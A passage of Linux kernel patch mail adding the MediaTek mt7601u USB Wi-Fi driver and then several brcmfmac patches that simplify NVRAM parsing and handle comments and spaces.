+void mt7601u_tx(struct ieee80211_hw *hw, struct ieee80211_tx_control *control, + struct sk_buff *skb) +{ + struct ieee80211_tx_info *info = IEEE80211_SKB_CB(skb); + struct mt7601u_dev *dev = hw->priv; + struct ieee80211_vif *vif = info->control.vif; + struct ieee80211_sta *sta = control->sta; + struct mt76_sta *msta = NULL; + struct mt76_wcid *wcid = dev->mon_wcid; + struct mt76_txwi *txwi; + int pkt_len = skb->len; + int hw_q = skb2q(skb); + + BUILD_BUG_ON(ARRAY_SIZE(info->status.status_driver_data) < 1); + info->status.status_driver_data[0] = (void *)(unsigned long)pkt_len; + + if (mt7601u_skb_rooms(dev, skb) || mt76_insert_hdr_pad(skb)) { + ieee80211_free_txskb(dev->hw, skb); + return; + } + + if (sta) { + msta = (struct mt76_sta *) sta->drv_priv; + wcid = &msta->wcid; + } else if (vif) { + struct mt76_vif *mvif = (struct mt76_vif *)vif->drv_priv; + + wcid = &mvif->group_wcid; + } + + txwi = mt7601u_push_txwi(dev, skb, sta, wcid, pkt_len); + + if (mt7601u_dma_enqueue_tx(dev, skb, wcid, hw_q)) + return; + + trace_mt_tx(dev, skb, msta, txwi); +} + +void mt7601u_tx_stat(struct work_struct *work) +{ + struct mt7601u_dev *dev = container_of(work, struct mt7601u_dev, + stat_work.work); + struct mt76_tx_status stat; + unsigned long flags; + int cleaned = 0; + + while (!test_bit(MT7601U_STATE_REMOVED, &dev->state)) { + stat = mt7601u_mac_fetch_tx_status(dev); + if (!stat.valid) + break; + + mt7601u_tx_pktid_dec(dev, &stat); + mt76_send_tx_status(dev, &stat); + + cleaned++; + } + trace_mt_tx_status_cleaned(dev, cleaned); + + spin_lock_irqsave(&dev->tx_lock, flags); + if (cleaned) + queue_delayed_work(dev->stat_wq, &dev->stat_work, + msecs_to_jiffies(10)); + else if (test_and_clear_bit(MT7601U_STATE_MORE_STATS, &dev->state)) + queue_delayed_work(dev->stat_wq, &dev->stat_work, + msecs_to_jiffies(20)); + else + clear_bit(MT7601U_STATE_READING_STATS, &dev->state); + spin_unlock_irqrestore(&dev->tx_lock, flags); +} + +int mt7601u_conf_tx(struct ieee80211_hw *hw, struct ieee80211_vif *vif, + u16 queue, const struct ieee80211_tx_queue_params *params) +{ + struct mt7601u_dev *dev = hw->priv; + u8 cw_min = 5, cw_max = 10, hw_q = q2hwq(queue); + u32 val; + + /* TODO: should we do funny things with the parameters? + * See what mt7601u_set_default_edca() used to do in init.c. + */ + + if (params->cw_min) + cw_min = fls(params->cw_min); + if (params->cw_max) + cw_max = fls(params->cw_max); + + WARN_ON(params->txop > 0xff); + WARN_ON(params->aifs > 0xf); + WARN_ON(cw_min > 0xf); + WARN_ON(cw_max > 0xf); + + val = MT76_SET(MT_EDCA_CFG_AIFSN, params->aifs) | + MT76_SET(MT_EDCA_CFG_CWMIN, cw_min) | + MT76_SET(MT_EDCA_CFG_CWMAX, cw_max); + /* TODO: based on user-controlled EnableTxBurst var vendor drv sets + * a really long txop on AC0 (see connect.c:2009) but only on + * connect? When not connected should be 0. + */ + if (!hw_q) + val |= 0x60; + else + val |= MT76_SET(MT_EDCA_CFG_TXOP, params->txop); + mt76_wr(dev, MT_EDCA_CFG_AC(hw_q), val); + + val = mt76_rr(dev, MT_WMM_TXOP(hw_q)); + val &= ~(MT_WMM_TXOP_MASK << MT_WMM_TXOP_SHIFT(hw_q)); + val |= params->txop << MT_WMM_TXOP_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_TXOP(hw_q), val); + + val = mt76_rr(dev, MT_WMM_AIFSN); + val &= ~(MT_WMM_AIFSN_MASK << MT_WMM_AIFSN_SHIFT(hw_q)); + val |= params->aifs << MT_WMM_AIFSN_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_AIFSN, val); + + val = mt76_rr(dev, MT_WMM_CWMIN); + val &= ~(MT_WMM_CWMIN_MASK << MT_WMM_CWMIN_SHIFT(hw_q)); + val |= cw_min << MT_WMM_CWMIN_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_CWMIN, val); + + val = mt76_rr(dev, MT_WMM_CWMAX); + val &= ~(MT_WMM_CWMAX_MASK << MT_WMM_CWMAX_SHIFT(hw_q)); + val |= cw_max << MT_WMM_CWMAX_SHIFT(hw_q); + mt76_wr(dev, MT_WMM_CWMAX, val); + + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/usb.c b/drivers/net/wireless/mediatek/mt7601u/usb.c new file mode 100644 index 000000000000..99e2b3997bfa --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/usb.c @@ -0,0 +1,360 @@ +/* + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include +#include +#include + +#include "mt7601u.h" +#include "usb.h" +#include "trace.h" + +static struct usb_device_id mt7601u_device_table[] = { + { USB_DEVICE(0x0b05, 0x17d3) }, + { USB_DEVICE(0x0e8d, 0x760a) }, + { USB_DEVICE(0x0e8d, 0x760b) }, + { USB_DEVICE(0x13d3, 0x3431) }, + { USB_DEVICE(0x13d3, 0x3434) }, + { USB_DEVICE(0x148f, 0x7601) }, + { USB_DEVICE(0x148f, 0x760a) }, + { USB_DEVICE(0x148f, 0x760b) }, + { USB_DEVICE(0x148f, 0x760c) }, + { USB_DEVICE(0x148f, 0x760d) }, + { USB_DEVICE(0x2001, 0x3d04) }, + { USB_DEVICE(0x2717, 0x4106) }, + { USB_DEVICE(0x2955, 0x0001) }, + { USB_DEVICE(0x2955, 0x1001) }, + { USB_DEVICE(0x2a5f, 0x1000) }, + { USB_DEVICE(0x7392, 0x7710) }, + { 0, } +}; + +bool mt7601u_usb_alloc_buf(struct mt7601u_dev *dev, size_t len, + struct mt7601u_dma_buf *buf) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + + buf->len = len; + buf->urb = usb_alloc_urb(0, GFP_KERNEL); + buf->buf = usb_alloc_coherent(usb_dev, buf->len, GFP_KERNEL, &buf->dma); + + return !buf->urb || !buf->buf; +} + +void mt7601u_usb_free_buf(struct mt7601u_dev *dev, struct mt7601u_dma_buf *buf) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + + usb_free_coherent(usb_dev, buf->len, buf->buf, buf->dma); + usb_free_urb(buf->urb); +} + +int mt7601u_usb_submit_buf(struct mt7601u_dev *dev, int dir, int ep_idx, + struct mt7601u_dma_buf *buf, gfp_t gfp, + usb_complete_t complete_fn, void *context) +{ + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + unsigned pipe; + int ret; + + if (dir == USB_DIR_IN) + pipe = usb_rcvbulkpipe(usb_dev, dev->in_eps[ep_idx]); + else + pipe = usb_sndbulkpipe(usb_dev, dev->out_eps[ep_idx]); + + usb_fill_bulk_urb(buf->urb, usb_dev, pipe, buf->buf, buf->len, + complete_fn, context); + buf->urb->transfer_dma = buf->dma; + buf->urb->transfer_flags |= URB_NO_TRANSFER_DMA_MAP; + + trace_mt_submit_urb(dev, buf->urb); + ret = usb_submit_urb(buf->urb, gfp); + if (ret) + dev_err(dev->dev, "Error: submit URB dir:%d ep:%d failed:%d\n", + dir, ep_idx, ret); + return ret; +} + +void mt7601u_complete_urb(struct urb *urb) +{ + struct completion *cmpl = urb->context; + + complete(cmpl); +} + +static int +__mt7601u_vendor_request(struct mt7601u_dev *dev, const u8 req, + const u8 direction, const u16 val, const u16 offset, + void *buf, const size_t buflen) +{ + int i, ret; + struct usb_device *usb_dev = mt7601u_to_usb_dev(dev); + const u8 req_type = direction | USB_TYPE_VENDOR | USB_RECIP_DEVICE; + const unsigned int pipe = (direction == USB_DIR_IN) ? + usb_rcvctrlpipe(usb_dev, 0) : usb_sndctrlpipe(usb_dev, 0); + + for (i = 0; i < MT_VEND_REQ_MAX_RETRY; i++) { + ret = usb_control_msg(usb_dev, pipe, req, req_type, + val, offset, buf, buflen, + MT_VEND_REQ_TOUT_MS); + trace_mt_vend_req(dev, pipe, req, req_type, val, offset, + buf, buflen, ret); + + if (ret >= 0 || ret == -ENODEV) + return ret; + + msleep(5); + } + + dev_err(dev->dev, "Vendor request req:%02x off:%04x failed:%d\n", + req, offset, ret); + + return ret; +} + +int +mt7601u_vendor_request(struct mt7601u_dev *dev, const u8 req, + const u8 direction, const u16 val, const u16 offset, + void *buf, const size_t buflen) +{ + int ret; + + mutex_lock(&dev->vendor_req_mutex); + + ret = __mt7601u_vendor_request(dev, req, direction, val, offset, + buf, buflen); + if (ret == -ENODEV) + set_bit(MT7601U_STATE_REMOVED, &dev->state); + + mutex_unlock(&dev->vendor_req_mutex); + + return ret; +} + +void mt7601u_vendor_reset(struct mt7601u_dev *dev) +{ + mt7601u_vendor_request(dev, MT_VEND_DEV_MODE, USB_DIR_OUT, + MT_VEND_DEV_MODE_RESET, 0, NULL, 0); +} + +u32 mt7601u_rr(struct mt7601u_dev *dev, u32 offset) +{ + int ret; + __le32 reg; + u32 val; + + WARN_ONCE(offset > USHRT_MAX, "read high off:%08x", offset); + + ret = mt7601u_vendor_request(dev, MT_VEND_MULTI_READ, USB_DIR_IN, + 0, offset, ®, sizeof(reg)); + val = le32_to_cpu(reg); + if (ret > 0 && ret != sizeof(reg)) { + dev_err(dev->dev, "Error: wrong size read:%d off:%08x\n", + ret, offset); + val = ~0; + } + + trace_reg_read(dev, offset, val); + return val; +} + +int mt7601u_vendor_single_wr(struct mt7601u_dev *dev, const u8 req, + const u16 offset, const u32 val) +{ + int ret; + + ret = mt7601u_vendor_request(dev, req, USB_DIR_OUT, + val & 0xffff, offset, NULL, 0); + if (ret) + return ret; + return mt7601u_vendor_request(dev, req, USB_DIR_OUT, + val >> 16, offset + 2, NULL, 0); +} + +void mt7601u_wr(struct mt7601u_dev *dev, u32 offset, u32 val) +{ + WARN_ONCE(offset > USHRT_MAX, "write high off:%08x", offset); + + mt7601u_vendor_single_wr(dev, MT_VEND_WRITE, offset, val); + trace_reg_write(dev, offset, val); +} + +u32 mt7601u_rmw(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val) +{ + val |= mt7601u_rr(dev, offset) & ~mask; + mt7601u_wr(dev, offset, val); + return val; +} + +u32 mt7601u_rmc(struct mt7601u_dev *dev, u32 offset, u32 mask, u32 val) +{ + u32 reg = mt7601u_rr(dev, offset); + + val |= reg & ~mask; + if (reg != val) + mt7601u_wr(dev, offset, val); + return val; +} + +void mt7601u_wr_copy(struct mt7601u_dev *dev, u32 offset, + const void *data, int len) +{ + WARN_ONCE(offset & 3, "unaligned write copy off:%08x", offset); + WARN_ONCE(len & 3, "short write copy off:%08x", offset); + + mt7601u_burst_write_regs(dev, offset, data, len / 4); +} + +void mt7601u_addr_wr(struct mt7601u_dev *dev, const u32 offset, const u8 *addr) +{ + mt7601u_wr(dev, offset, get_unaligned_le32(addr)); + mt7601u_wr(dev, offset + 4, addr[4] | addr[5] << 8); +} + +static int mt7601u_assign_pipes(struct usb_interface *usb_intf, + struct mt7601u_dev *dev) +{ + struct usb_endpoint_descriptor *ep_desc; + struct usb_host_interface *intf_desc = usb_intf->cur_altsetting; + unsigned i, ep_i = 0, ep_o = 0; + + BUILD_BUG_ON(sizeof(dev->in_eps) < __MT_EP_IN_MAX); + BUILD_BUG_ON(sizeof(dev->out_eps) < __MT_EP_OUT_MAX); + + for (i = 0; i < intf_desc->desc.bNumEndpoints; i++) { + ep_desc = &intf_desc->endpoint[i].desc; + + if (usb_endpoint_is_bulk_in(ep_desc) && + ep_i++ < __MT_EP_IN_MAX) { + dev->in_eps[ep_i - 1] = usb_endpoint_num(ep_desc); + dev->in_max_packet = usb_endpoint_maxp(ep_desc); + /* Note: this is ignored by usb sub-system but vendor + * code does it. We can drop this at some point. + */ + dev->in_eps[ep_i - 1] |= USB_DIR_IN; + } else if (usb_endpoint_is_bulk_out(ep_desc) && + ep_o++ < __MT_EP_OUT_MAX) { + dev->out_eps[ep_o - 1] = usb_endpoint_num(ep_desc); + dev->out_max_packet = usb_endpoint_maxp(ep_desc); + } + } + + if (ep_i != __MT_EP_IN_MAX || ep_o != __MT_EP_OUT_MAX) { + dev_err(dev->dev, "Error: wrong pipe number in:%d out:%d\n", + ep_i, ep_o); + return -EINVAL; + } + + return 0; +} + +static int mt7601u_probe(struct usb_interface *usb_intf, + const struct usb_device_id *id) +{ + struct usb_device *usb_dev = interface_to_usbdev(usb_intf); + struct mt7601u_dev *dev; + u32 asic_rev, mac_rev; + int ret; + + dev = mt7601u_alloc_device(&usb_intf->dev); + if (!dev) + return -ENOMEM; + + usb_dev = usb_get_dev(usb_dev); + usb_reset_device(usb_dev); + + usb_set_intfdata(usb_intf, dev); + + ret = mt7601u_assign_pipes(usb_intf, dev); + if (ret) + goto err; + ret = mt7601u_wait_asic_ready(dev); + if (ret) + goto err; + + asic_rev = mt7601u_rr(dev, MT_ASIC_VERSION); + mac_rev = mt7601u_rr(dev, MT_MAC_CSR0); + dev_info(dev->dev, "ASIC revision: %08x MAC revision: %08x\n", + asic_rev, mac_rev); + + /* Note: vendor driver skips this check for MT7601U */ + if (!(mt7601u_rr(dev, MT_EFUSE_CTRL) & MT_EFUSE_CTRL_SEL)) + dev_warn(dev->dev, "Warning: eFUSE not present\n"); + + ret = mt7601u_init_hardware(dev); + if (ret) + goto err; + ret = mt7601u_register_device(dev); + if (ret) + goto err_hw; + + set_bit(MT7601U_STATE_INITIALIZED, &dev->state); + + return 0; +err_hw: + mt7601u_cleanup(dev); +err: + usb_set_intfdata(usb_intf, NULL); + usb_put_dev(interface_to_usbdev(usb_intf)); + + destroy_workqueue(dev->stat_wq); + ieee80211_free_hw(dev->hw); + return ret; +} + +static void mt7601u_disconnect(struct usb_interface *usb_intf) +{ + struct mt7601u_dev *dev = usb_get_intfdata(usb_intf); + + ieee80211_unregister_hw(dev->hw); + mt7601u_cleanup(dev); + + usb_set_intfdata(usb_intf, NULL); + usb_put_dev(interface_to_usbdev(usb_intf)); + + destroy_workqueue(dev->stat_wq); + ieee80211_free_hw(dev->hw); +} + +static int mt7601u_suspend(struct usb_interface *usb_intf, pm_message_t state) +{ + struct mt7601u_dev *dev = usb_get_intfdata(usb_intf); + + mt7601u_cleanup(dev); + + return 0; +} + +static int mt7601u_resume(struct usb_interface *usb_intf) +{ + struct mt7601u_dev *dev = usb_get_intfdata(usb_intf); + + return mt7601u_init_hardware(dev); +} + +MODULE_DEVICE_TABLE(usb, mt7601u_device_table); +MODULE_FIRMWARE(MT7601U_FIRMWARE); +MODULE_LICENSE("GPL"); + +static struct usb_driver mt7601u_driver = { + .name = KBUILD_MODNAME, + .id_table = mt7601u_device_table, + .probe = mt7601u_probe, + .disconnect = mt7601u_disconnect, + .suspend = mt7601u_suspend, + .resume = mt7601u_resume, + .reset_resume = mt7601u_resume, + .soft_unbind = 1, + .disable_hub_initiated_lpm = 1, +}; +module_usb_driver(mt7601u_driver); diff --git a/drivers/net/wireless/mediatek/mt7601u/usb.h b/drivers/net/wireless/mediatek/mt7601u/usb.h new file mode 100644 index 000000000000..49e188fa3798 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/usb.h @@ -0,0 +1,77 @@ +/* + * Copyright (C) 2015 Jakub Kicinski + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT7601U_USB_H +#define __MT7601U_USB_H + +#include "mt7601u.h" + +#define MT7601U_FIRMWARE "mt7601u.bin" + +#define MT_VEND_REQ_MAX_RETRY 10 +#define MT_VEND_REQ_TOUT_MS 300 + +#define MT_VEND_DEV_MODE_RESET 1 + +enum mt_vendor_req { + MT_VEND_DEV_MODE = 1, + MT_VEND_WRITE = 2, + MT_VEND_MULTI_READ = 7, + MT_VEND_WRITE_FCE = 0x42, +}; + +enum mt_usb_ep_in { + MT_EP_IN_PKT_RX, + MT_EP_IN_CMD_RESP, + __MT_EP_IN_MAX, +}; + +enum mt_usb_ep_out { + MT_EP_OUT_INBAND_CMD, + MT_EP_OUT_AC_BK, + MT_EP_OUT_AC_BE, + MT_EP_OUT_AC_VI, + MT_EP_OUT_AC_VO, + MT_EP_OUT_HCCA, + __MT_EP_OUT_MAX, +}; + +static inline struct usb_device *mt7601u_to_usb_dev(struct mt7601u_dev *mt7601u) +{ + return interface_to_usbdev(to_usb_interface(mt7601u->dev)); +} + +static inline bool mt7601u_urb_has_error(struct urb *urb) +{ + return urb->status && + urb->status != -ENOENT && + urb->status != -ECONNRESET && + urb->status != -ESHUTDOWN; +} + +bool mt7601u_usb_alloc_buf(struct mt7601u_dev *dev, size_t len, + struct mt7601u_dma_buf *buf); +void mt7601u_usb_free_buf(struct mt7601u_dev *dev, struct mt7601u_dma_buf *buf); +int mt7601u_usb_submit_buf(struct mt7601u_dev *dev, int dir, int ep_idx, + struct mt7601u_dma_buf *buf, gfp_t gfp, + usb_complete_t complete_fn, void *context); +void mt7601u_complete_urb(struct urb *urb); + +int mt7601u_vendor_request(struct mt7601u_dev *dev, const u8 req, + const u8 direction, const u16 val, const u16 offset, + void *buf, const size_t buflen); +void mt7601u_vendor_reset(struct mt7601u_dev *dev); +int mt7601u_vendor_single_wr(struct mt7601u_dev *dev, const u8 req, + const u16 offset, const u32 val); + +#endif diff --git a/drivers/net/wireless/mediatek/mt7601u/util.c b/drivers/net/wireless/mediatek/mt7601u/util.c new file mode 100644 index 000000000000..7c1787c1ddcd --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/util.c @@ -0,0 +1,42 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#include "mt7601u.h" + +void mt76_remove_hdr_pad(struct sk_buff *skb) +{ + int len = ieee80211_get_hdrlen_from_skb(skb); + + memmove(skb->data + 2, skb->data, len); + skb_pull(skb, 2); +} + +int mt76_insert_hdr_pad(struct sk_buff *skb) +{ + int len = ieee80211_get_hdrlen_from_skb(skb); + int ret; + + if (len % 4 == 0) + return 0; + + ret = skb_cow(skb, 2); + if (ret) + return ret; + + skb_push(skb, 2); + memmove(skb->data, skb->data + 2, len); + + skb->data[len] = 0; + skb->data[len + 1] = 0; + return 0; +} diff --git a/drivers/net/wireless/mediatek/mt7601u/util.h b/drivers/net/wireless/mediatek/mt7601u/util.h new file mode 100644 index 000000000000..b89140bf1210 --- /dev/null +++ b/drivers/net/wireless/mediatek/mt7601u/util.h @@ -0,0 +1,77 @@ +/* + * Copyright (C) 2014 Felix Fietkau + * Copyright (C) 2004 - 2009 Ivo van Doorn + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License version 2 + * as published by the Free Software Foundation + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + */ + +#ifndef __MT76_UTIL_H +#define __MT76_UTIL_H + +/* + * Power of two check, this will check + * if the mask that has been given contains and contiguous set of bits. + * Note that we cannot use the is_power_of_2() function since this + * check must be done at compile-time. + */ +#define is_power_of_two(x) ( !((x) & ((x)-1)) ) +#define low_bit_mask(x) ( ((x)-1) & ~(x) ) +#define is_valid_mask(x) is_power_of_two(1LU + (x) + low_bit_mask(x)) + +/* + * Macros to find first set bit in a variable. + * These macros behave the same as the __ffs() functions but + * the most important difference that this is done during + * compile-time rather then run-time. + */ +#define compile_ffs2(__x) \ + __builtin_choose_expr(((__x) & 0x1), 0, 1) + +#define compile_ffs4(__x) \ + __builtin_choose_expr(((__x) & 0x3), \ + (compile_ffs2((__x))), \ + (compile_ffs2((__x) >> 2) + 2)) + +#define compile_ffs8(__x) \ + __builtin_choose_expr(((__x) & 0xf), \ + (compile_ffs4((__x))), \ + (compile_ffs4((__x) >> 4) + 4)) + +#define compile_ffs16(__x) \ + __builtin_choose_expr(((__x) & 0xff), \ + (compile_ffs8((__x))), \ + (compile_ffs8((__x) >> 8) + 8)) + +#define compile_ffs32(__x) \ + __builtin_choose_expr(((__x) & 0xffff), \ + (compile_ffs16((__x))), \ + (compile_ffs16((__x) >> 16) + 16)) + +/* + * This macro will check the requirements for the FIELD{8,16,32} macros + * The mask should be a constant non-zero contiguous set of bits which + * does not exceed the given typelimit. + */ +#define FIELD_CHECK(__mask) \ + BUILD_BUG_ON(!(__mask) || !is_valid_mask(__mask)) + +#define MT76_SET(_mask, _val) \ + ({ \ + FIELD_CHECK(_mask); \ + (((u32) (_val)) << compile_ffs32(_mask)) & _mask; \ + }) + +#define MT76_GET(_mask, _val) \ + ({ \ + FIELD_CHECK(_mask); \ + (u32) (((_val) & _mask) >> compile_ffs32(_mask)); \ + }) + +#endif From ae8c2366d77cd7c6de776bcb1dcb6be88f2a1185 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 20 May 2015 09:34:21 +0200 Subject: [PATCH 350/872] brcmfmac: simplify check stripping v2 NVRAM MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Comparing NVRAM entry with a full filtering string is simpler than comparing it with a short prefix and then checking random chars at magic offsets. The cost of snprintf relatively low, we execute it just once. Tested on BCM43602 with NVRAM hacked to use V2 format. Signed-off-by: Rafał Miłecki Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/firmware.c | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index 8ff31ffa4a41..181a0e848582 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -25,7 +25,7 @@ #define BRCMF_FW_MAX_NVRAM_SIZE 64000 #define BRCMF_FW_NVRAM_DEVPATH_LEN 19 /* devpath0=pcie/1/4/ */ -#define BRCMF_FW_NVRAM_PCIEDEV_LEN 9 /* pcie/1/4/ */ +#define BRCMF_FW_NVRAM_PCIEDEV_LEN 10 /* pcie/1/4/ + \0 */ char brcmf_firmware_path[BRCMF_FW_PATH_LEN]; module_param_string(firmware_path, brcmf_firmware_path, @@ -297,6 +297,8 @@ static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, static void brcmf_fw_strip_multi_v2(struct nvram_parser *nvp, u16 domain_nr, u16 bus_nr) { + char prefix[BRCMF_FW_NVRAM_PCIEDEV_LEN]; + size_t len; u32 i, j; u8 *nvram; @@ -308,14 +310,13 @@ static void brcmf_fw_strip_multi_v2(struct nvram_parser *nvp, u16 domain_nr, * Valid entries are of type pcie/X/Y/ where X = domain_nr and * Y = bus_nr. */ + snprintf(prefix, sizeof(prefix), "pcie/%d/%d/", domain_nr, bus_nr); + len = strlen(prefix); i = 0; j = 0; - while (i < nvp->nvram_len - BRCMF_FW_NVRAM_PCIEDEV_LEN) { - if ((strncmp(&nvp->nvram[i], "pcie/", 5) == 0) && - (nvp->nvram[i + 6] == '/') && (nvp->nvram[i + 8] == '/') && - ((nvp->nvram[i + 5] - '0') == domain_nr) && - ((nvp->nvram[i + 7] - '0') == bus_nr)) { - i += BRCMF_FW_NVRAM_PCIEDEV_LEN; + while (i < nvp->nvram_len - len) { + if (strncmp(&nvp->nvram[i], prefix, len) == 0) { + i += len; while (nvp->nvram[i] != 0) { nvram[j] = nvp->nvram[i]; i++; From 5d08408b6f6b28d9a57ab7b2c7419ca8bfc6b8a4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 20 May 2015 11:01:08 +0200 Subject: [PATCH 351/872] brcmfmac: simplify check finding NVRAM v1 device path MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit With a simple use of snprintf and small buffer we can compare NVRAM entry value with a full string. This way we avoid checking random chars at magic offsets. Tested on BCM43602 with NVRAM hacked to use v1 format. Signed-off-by: Rafał Miłecki Signed-off-by: Kalle Valo --- .../net/wireless/brcm80211/brcmfmac/firmware.c | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index 181a0e848582..a1e1253a06c8 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -222,6 +222,10 @@ static int brcmf_init_nvram_parser(struct nvram_parser *nvp, static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, u16 bus_nr) { + /* Device path with a leading '=' key-value separator */ + char pcie_path[] = "=pcie/?/?"; + size_t pcie_len; + u32 i, j; bool found; u8 *nvram; @@ -238,6 +242,9 @@ static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, /* First search for the devpathX and see if it is the configuration * for domain_nr/bus_nr. Search complete nvp */ + snprintf(pcie_path, sizeof(pcie_path), "=pcie/%d/%d", domain_nr, + bus_nr); + pcie_len = strlen(pcie_path); found = false; i = 0; while (i < nvp->nvram_len - BRCMF_FW_NVRAM_DEVPATH_LEN) { @@ -245,13 +252,10 @@ static void brcmf_fw_strip_multi_v1(struct nvram_parser *nvp, u16 domain_nr, * Y = domain_nr, Z = bus_nr, X = virtual ID */ if ((strncmp(&nvp->nvram[i], "devpath", 7) == 0) && - (strncmp(&nvp->nvram[i + 8], "=pcie/", 6) == 0)) { - if (((nvp->nvram[i + 14] - '0') == domain_nr) && - ((nvp->nvram[i + 16] - '0') == bus_nr)) { - id = nvp->nvram[i + 7] - '0'; - found = true; - break; - } + (strncmp(&nvp->nvram[i + 8], pcie_path, pcie_len) == 0)) { + id = nvp->nvram[i + 7] - '0'; + found = true; + break; } while (nvp->nvram[i] != 0) i++; From 279b4cb7bc143643b6380a7198834f3bfbee7df7 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Wed, 20 May 2015 13:59:54 +0200 Subject: [PATCH 352/872] brcmfmac: treat \0 as end of comment when parsing NVRAM MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This fixes brcmfmac dealing with NVRAM coming from platform e.g. from a flash MTD partition. In such cases entries are separated by \0 instead of \n which caused ignoring whole content after the first "comment". While platform NVRAM doesn't usually contain comments, we switch to COMMENT state after e.g. finding an unexpected char in key name. Signed-off-by: Rafał Miłecki Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/firmware.c | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index a1e1253a06c8..e6673a9b6e9e 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -162,17 +162,20 @@ brcmf_nvram_handle_value(struct nvram_parser *nvp) static enum nvram_parser_state brcmf_nvram_handle_comment(struct nvram_parser *nvp) { - char *eol, *sol; + char *eoc, *sol; sol = (char *)&nvp->fwnv->data[nvp->pos]; - eol = strchr(sol, '\n'); - if (eol == NULL) - return END; + eoc = strchr(sol, '\n'); + if (!eoc) { + eoc = strchr(sol, '\0'); + if (!eoc) + return END; + } /* eat all moving to next line */ nvp->line++; nvp->column = 1; - nvp->pos += (eol - sol) + 1; + nvp->pos += (eoc - sol) + 1; return IDLE; } From fc23e81eb8f4231aa8a34c83e95c11d72e494f1d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Rafa=C5=82=20Mi=C5=82ecki?= Date: Sat, 23 May 2015 09:15:33 +0200 Subject: [PATCH 353/872] brcmfmac: allow NVRAM values to contain spaces MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Platform NVRAMs often contain values with spaces. Even if right now most firmware-supported entries are simple values, we shouldn't reject these with spaces. It was semi-confirmed by Broadcom in the early patch adding support for platform NVRAMs. Signed-off-by: Rafał Miłecki Acked-by: Arend van Spriel Signed-off-by: Kalle Valo --- drivers/net/wireless/brcm80211/brcmfmac/firmware.c | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c index e6673a9b6e9e..7ae6461df932 100644 --- a/drivers/net/wireless/brcm80211/brcmfmac/firmware.c +++ b/drivers/net/wireless/brcm80211/brcmfmac/firmware.c @@ -66,6 +66,12 @@ struct nvram_parser { bool multi_dev_v2; }; +/** + * is_nvram_char() - check if char is a valid one for NVRAM entry + * + * It accepts all printable ASCII chars except for '#' which opens a comment. + * Please note that ' ' (space) while accepted is not a valid key name char. + */ static bool is_nvram_char(char c) { /* comment marker excluded */ @@ -73,7 +79,7 @@ static bool is_nvram_char(char c) return false; /* key and value may have any 